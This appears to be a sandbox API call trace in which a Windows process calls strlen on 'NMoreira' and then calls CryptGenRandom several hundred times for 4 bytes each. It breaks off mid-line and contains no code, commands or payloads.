[0164.775] strlen (_Str="NMoreira") returned 0x8 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.775] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.776] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.777] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.778] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.779] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 